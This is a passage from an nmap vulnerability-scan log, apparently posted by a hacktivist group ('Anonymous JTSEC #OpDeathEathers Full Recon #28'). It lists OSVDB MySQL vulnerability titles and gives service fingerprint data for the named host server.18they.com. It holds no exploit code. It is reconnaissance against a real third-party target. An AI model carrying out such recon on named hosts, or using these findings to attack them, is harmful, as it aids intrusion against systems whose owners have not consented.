21137| [23526] MySQL Query NULL Charcter Logging Bypass
21138| [23157] PHP/MYSQL Timesheet changehrs.php Multiple Parameter SQL Injection
21139| [23156] PHP/MYSQL Timesheet index.php Multiple Parameter SQL Injection
21140| [22995] PAM-MySQL Authentication pam_get_item() Function Unspecified Privilege Escalation
21141| [22994] PAM-MySQL SQL Logging Facility Segfault DoS
21142| [22485] Recruitment Software admin/site.xml MySQL Authentication Credential Disclosure
21143| [22479] PHP mysqli Extension Error Message Format String
21144| [22232] PHP Pipe Variable mysql_connect() Function Overflow
21145| [21685] MySQL Auction Search Module keyword XSS
21146| [20698] Campsite notifyendsubs Cron MySQL Password Cleartext Remote Disclosure
21147| [20145] Proofpoint Protection Server Embedded MySQL Server Unpassworded root Account
21148| [19457] aMember Pro mysql.inc.php Remote File Inclusion
21149| [19377] MAXdev MD-Pro /MySQL_Tools/admin.php Path Disclosure
21150| [18899] MySQL UDF Library Arbitrary Function Load Privilege Escalation
21151| [18898] MySQL UDF LoadLibraryEx Function Nonexistent Library Load DoS
21152| [18897] MySQL on Windows UDF Create Function Traversal Privilege Escalation
21153| [18896] MySQL User-Defined Function init_syms() Function Overflow
21154| [18895] MySQL libmysqlclient.so host Parameter Remote Overflow
21155| [18894] MySQL drop database Request Remote Overflow
21156| [18622] FunkBoard mysql_install.php Email Field Arbitrary PHP Code Injection
21157| [18620] FunkBoard mysql_install.php Admin/Database Password Manipulation
21158| [18406] MySQL Eventum releases.php SQL Injection
21159| [18405] MySQL Eventum custom_fields_graph.php SQL Injection
21160| [18404] MySQL Eventum custom_fields.php SQL Injection
21161| [18403] MySQL Eventum login.php email Parameter SQL Injection Authentication Bypass
21162| [18402] MySQL Eventum get_jsrs_data.php F Parameter XSS
21163| [18401] MySQL Eventum list.php release Parameter XSS
21164| [18400] MySQL Eventum view.php id Parameter XSS
21165| [18173] MySQL on Windows USE Command MS-DOS Device Name DoS
21166| [17801] Bugzilla MySQL Replication Race Condition Information Disclosure
21167| [17223] xMySQLadmin Symlink Arbitrary File Deletion
21168| [16727] MySQL Nonexistent '--user' Error Incorrect Privilege Database Invocation
21169| [16689] MySQL mysql_install_db Symlink Arbitrary File Overwrite
21170| [16056] Plans Unspecified mySQL Remote Password Disclosure
21171| [15993] MySQL MaxDB Webtool Remote getIfHeader() WebDAV Function Remote Overflow
21172| [15817] MySQL MaxDB Web Tool getLockTokenHeader() Function Remote Overflow
21173| [15816] MySQL MaxDB Web Administration Service Malformed GET Request Overflow
21174| [15451] paNews auth.php mysql_prefix Parameter SQL Injection
21175| [14748] MySQL MS-DOS Device Names Request DoS
21176| [14678] MySQL CREATE FUNCTION Arbitrary libc Code Execution
21177| [14677] MySQL CREATE FUNCTION mysql.func Table Arbitrary Library Injection
21178| [14676] MySQL CREATE TEMPORARY TABLE Symlink Privilege Escalation
21179| [14386] phpMyAdmin mysqli.dbi.lib.php Path Disclosure
21180| [14052] Symantec Brightmail AntiSpam Multiple Default MySQL Accounts
21181| [13086] MySQL MaxDB Web Agent Malformed HTTP Header DoS
21182| [13085] MySQL MaxDB Web Agent WebDAV sapdbwa_GetUserData() Function Remote DoS
21183| [13013] MySQL mysqlaccess.sh Symlink Arbitrary File Manipulation
21184| [12919] MySQL MaxDB WebAgent websql Remote Overflow
21185| [12779] MySQL User Defined Function Privilege Escalation
21186| [12609] MySQL Eventum projects.php Multiple Parameter XSS
21187| [12608] MySQL Eventum preferences.php Multiple Parameter XSS
21188| [12607] MySQL Eventum forgot_password.php email Parameter XSS
21189| [12606] MySQL Eventum index.php email Parameter XSS
21190| [12605] MySQL Eventum Default Vendor Account
21191| [12275] MySQL MaxDB Web Tools wahttp Nonexistent File Request DoS
21192| [12274] MySQL MaxDB Web Tools WebDAV Handler Remote Overflow
21193| [11689] Roxen Web Server MySQL Socket Permission Weakness
21194| [10985] MySQL MATCH..AGAINST Query DoS
21195| [10959] MySQL GRANT ALL ON Privilege Escalation
21196| [10660] MySQL ALTER TABLE/RENAME Forces Old Permission Checks
21197| [10659] MySQL ALTER MERGE Tables to Change the UNION DoS
21198| [10658] MySQL mysql_real_connect() Function Remote Overflow
21199| [10532] MySQL MaxDB webdbm Server Field DoS
21200| [10491] AWS MySQLguest AWSguest.php Script Insertion
21201| [10244] MySQL libmysqlclient Prepared Statements API Overflow
21202| [10226] MySQLGuest AWSguest.php Multiple Field XSS
21203| [9912] PHP safe_mode MySQL Database Access Restriction Bypass
21204| [9911] Inter7 vpopmail MySQL Module Authentication Credential Disclosure
21205| [9910] MySQL mysql_change_user() Double-free Memory Pointer DoS
21206| [9909] MySQL datadir/my.cnf Modification Privilege Escalation
21207| [9908] MySQL my.ini Initialization File datadir Parameter Overflow
21208| [9907] MySQL SELECT Statement String Handling Overflow
21209| [9906] MySQL GRANT Privilege Arbitrary Password Modification
21210| [9509] teapop MySQL Authentication Module SQL Injection
21211| [9018] MySQL Backup Pro getbackup() Method Unspecified Issue
21212| [9015] MySQL mysqlhotcopy Insecure Temporary File Creation
21213| [8997] Cacti config.php MySQL Authentication Credential Cleartext Disclosure
21214| [8979] MySQL SHOW GRANTS Encrypted Password Disclosure
21215| [8889] MySQL COM_TABLE_DUMP Package Negative Integer DoS
21216| [8888] MySQL COM_CHANGE_USER Command Long Repsonse Overflow
21217| [8887] MySQL COM_CHANGE_USER Command One Character Password Brute Force
21218| [8886] MySQL libmysqlclient Library read_one_row Overflow
21219| [8885] MySQL libmysqlclient Library read_rows Overflow
21220| [7476] MySQL Protocol 4.1 Authentication Scramble String Overflow
21221| [7475] MySQL Zero-length Scrambled String Crafted Packet Authentication Bypass
21222| [7245] MySQL Pluggable Authentication Module (pam_mysql) Password Disclosure
21223| [7128] MySQL show database Database Name Exposure
21224| [6716] MySQL Database Engine Weak Authentication Information Disclosure
21225| [6605] MySQL mysqld Readable Log File Information Disclosure
21226| [6443] PowerPhlogger db_dump.php View Arbitrary mySQL Dump
21227| [6421] MySQL mysqld_multi Symlink Arbitrary File Overwrite
21228| [6420] MySQL mysqlbug Symlink Arbitrary File Overwrite
21229| [2537] MySQL sql_acl.cc get_salt_from_password Function Password Handling Remote Overflow
21230| [2144] WinMySQLadmin my.ini Cleartext Password Disclosure
21231| [653] PCCS-Linux MySQL Database Admin Tool Authentication Credential Disclosure
21232| [520] MySQL Database Name Traversal Arbitrary File Modification
21233| [380] MySQL Server on Windows Default Null Root Password
21234| [261] MySQL Short Check String Authentication Bypass
21235|_
212361 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
21237SF-Port993-TCP:V=7.80%T=SSL%I=7%D=3/18%Time=5E72BF4E%P=x86_64-pc-linux-gnu
21238SF:%r(NULL,6A,"\*\x20OK\x20\[CAPABILITY\x20IMAP4rev1\x20SASL-IR\x20LOGIN-R
21239SF:EFERRALS\x20ID\x20ENABLE\x20IDLE\x20LITERAL\+\x20AUTH=PLAIN\]\x20Doveco
21240SF:t\x20DA\x20ready\.\r\n");
21241Service Info: Host: server.18they.com; OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:6
21242####################################################################################################################################
21243 Anonymous JTSEC #OpDeathEathers Full Recon #28